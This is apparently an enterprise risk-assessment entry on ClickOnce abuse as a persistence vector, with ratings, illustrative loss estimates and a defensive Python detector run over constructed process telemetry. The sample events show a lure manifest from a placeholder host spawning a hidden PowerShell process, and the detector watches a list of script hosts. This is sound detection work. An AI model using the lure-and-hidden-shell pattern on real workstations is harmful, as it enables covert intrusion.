Likelihood: MODERATE
Impact: HIGH
Treatment: MITIGATE
Confidence: Moderate
Likelihood is moderate because using ClickOnce as an initial-access and persistence vector still depends on the attacker delivering a lure (phishing, watering hole, or a supply-chain channel), but it requires neither administrative privileges nor a vulnerability that a patch could close, and CrowdStrike has documented the technique as an active, maturing pattern against broadly deployed Windows enterprise environments that most security stacks do not currently detect. Impact is high because successful abuse yields durable, low-visibility persistence on employee workstations: it extends dwell time, increases data-exfiltration and lateral-movement exposure, and operates entirely outside the privilege-escalation alerting that most SOC playbooks depend on.
Treatment rationale: No patch is available and the feature cannot be trivially disabled without operational disruption, so the only viable primary treatment is deliberate investment in compensating detection controls, ClickOnce allowlisting policy, and user-awareness measures to reduce the delivery vector.
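The "compensating detection controls" and "allowlisting policy" named above can be made concrete as process-creation rules. The following is an added example written for this page, not code from CrowdStrike or from the original assessment. It relies on standard .NET behaviour: a deployment manifest carries the .application extension, Windows launches it through rundll32.exe dfshim.dll,ShOpenVerbApplication <url>, the deployment is hosted by dfsvc.exe, and the installed binaries run from %LOCALAPPDATA%\Apps\2.0\. The event records, the allowlisted host deploy.corp.example, and the sanctioned binary Payroll.exe are constructed assumptions.

```python
"""Toy ClickOnce-launch detector over constructed Sysmon-style process-creation
records. The allowlists and sample events below are assumptions for illustration."""
import re
from urllib.parse import urlparse

# Assumed allowlist: the only host the organization deploys ClickOnce apps from.
ALLOWED_DEPLOY_HOSTS = {"deploy.corp.example"}
# Assumed allowlist: binaries of sanctioned ClickOnce applications.
ALLOWED_CLICKONCE_EXES = {"payroll.exe"}
# Script hosts a line-of-business ClickOnce app should not be spawning.
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "mshta.exe", "wscript.exe",
                "cscript.exe", "rundll32.exe"}

# Windows launches a .application manifest via dfshim.dll's ShOpenVerbApplication verb;
# the token after the verb is the deployment URL (or a UNC path).
LAUNCH_RE = re.compile(r"dfshim\.dll\s*,\s*ShOpenVerbApplication\s+(\S+)", re.I)
# Installed ClickOnce binaries live under the per-user Apps\2.0 store.
APPS_20_RE = re.compile(r"\\AppData\\Local\\Apps\\2\.0\\", re.I)


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def check_event(ev):
    """Return the names of the rules a single process-creation event trips."""
    hits = []
    image, parent, cmd = ev["Image"], ev["ParentImage"], ev["CommandLine"]

    # Rule 1: manifest launched from a host that is not an approved deployment host.
    # A UNC path has no hostname and is therefore also treated as unapproved.
    m = LAUNCH_RE.search(cmd)
    if basename(image) == "rundll32.exe" and m:
        host = (urlparse(m.group(1)).hostname or "").lower()
        if host not in ALLOWED_DEPLOY_HOSTS:
            hits.append("clickonce_launch_from_unapproved_host")

    # Rule 2: dfsvc.exe started a binary from Apps\2.0 that is not a sanctioned app.
    if (APPS_20_RE.search(image) and basename(parent) == "dfsvc.exe"
            and basename(image) not in ALLOWED_CLICKONCE_EXES):
        hits.append("unapproved_clickonce_app_started")

    # Rule 3: a ClickOnce-hosted binary spawned a script host (post-persistence activity).
    if APPS_20_RE.search(parent) and basename(image) in SCRIPT_HOSTS:
        hits.append("clickonce_app_spawned_script_host")
    return hits


def scan(events):
    """Run every rule over every event; returns (rule, image) pairs in event order."""
    return [(rule, ev["Image"]) for ev in events for rule in check_event(ev)]


# Constructed sample telemetry (not real logs). Events 1-2 are the sanctioned payroll
# app; events 3-5 are a lure served from an unapproved host; event 6 is noise.
APPS = r"C:\Users\alice\AppData\Local\Apps\2.0"
DFSVC = r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
INVOICE_EXE = APPS + r"\QRST5678.901\UVWX2345.678\invo..tion_0000000000000000_0001.0000_0123456789abcdef\Invoice.exe"
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\rundll32.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "rundll32.exe dfshim.dll,ShOpenVerbApplication https://deploy.corp.example/payroll/Payroll.application"},
    {"Image": APPS + r"\ABCD1234.567\EFGH8901.234\payr..tion_0000000000000000_0001.0000_abcdef0123456789\Payroll.exe",
     "ParentImage": DFSVC, "CommandLine": "Payroll.exe"},
    {"Image": r"C:\Windows\System32\rundll32.exe", "ParentImage": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "CommandLine": "rundll32.exe dfshim.dll,ShOpenVerbApplication http://cdn.invoice-update.example/Invoice.application"},
    {"Image": INVOICE_EXE, "ParentImage": DFSVC, "CommandLine": "Invoice.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "ParentImage": INVOICE_EXE,
     "CommandLine": "powershell.exe -nop -w hidden"},
    {"Image": r"C:\Windows\System32\notepad.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for rule, image in scan(SAMPLE_EVENTS):
        print(f"{rule}: {image}")
```

Rule 1 is the allowlisting control expressed as detection; rules 2 and 3 catch the persistence stage and the follow-on activity that the rationale says runs outside privilege-escalation alerting, so they fire even when no elevation ever occurs. The preventive counterpart is ClickOnce's own trust-prompt policy (the TrustManager PromptingLevel registry values, which can require Authenticode-signed manifests per zone); a detection like this complements that policy rather than replacing it.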
Third-Party / Supply-Chain Risk
Organizations that rely on third-party software vendors or internal development teams distributing applications via ClickOnce share the same trusted-deployment channel an attacker would abuse. A compromised or spoofed ClickOnce manifest delivered through a vendor update pipeline, partner portal, or shared software repository could propagate malicious payloads across the supply chain without triggering vendor-management controls, which is consistent with the NIST SP 800-161 concerns around the integrity of trusted third-party software distribution.
Loss Exposure (illustrative)
Magnitude: Moderate to high — illustrative $250K–$2M per incident, driven primarily by incident response labor, forensic investigation of low-visibility dwell time, potential data-exfiltration remediation, and reputational costs if persistence goes undetected for an extended period.
Frequency: Illustrative 1–2 incidents per 3-year horizon for a mid-to-large enterprise with no ClickOnce monitoring, given the technique's documented maturity, privilege-free execution, and absence of detection coverage in most standard security stacks.
Annualized: Illustrative ALE of approximately $250K–$500K annually, derived from a representative per-incident loss of ~$750K (near the geometric mean of the $250K–$2M range) multiplied by the illustrative frequency of ~0.33–0.67 events/year (1–2 incidents per 3-year horizon).
Basis: Loss magnitude reflects incident response and forensic investigation costs associated with a long-dwell intrusion (IR labor, endpoint reimaging, potential data-loss assessment), not a breach with confirmed exfiltration. Frequency reflects the privilege-free, detection-evading nature of the technique against an unmonitored attack surface, weighted against the fact that exploitation still requires a successful delivery mechanism. No third-party breach-cost reports cited.
Illustrative estimate — not actuarially derived.
Insurance / Contractual / Legal — Potential Obligations
Potential triggers, not legal determinations. Verify with counsel/broker before acting.
• If a ClickOnce-based intrusion results in unauthorized access to employee or customer PII, this may invoke state and federal breach-notification obligations — verify with counsel.
• Extended dwell time and low-visibility persistence resulting from this technique could affect cyber-insurance claim adjudication related to timely detection and response requirements — verify with broker.
• If a third-party software vendor's ClickOnce distribution channel is the delivery mechanism, this may trigger contractual incident-notification clauses in vendor agreements — verify with counsel.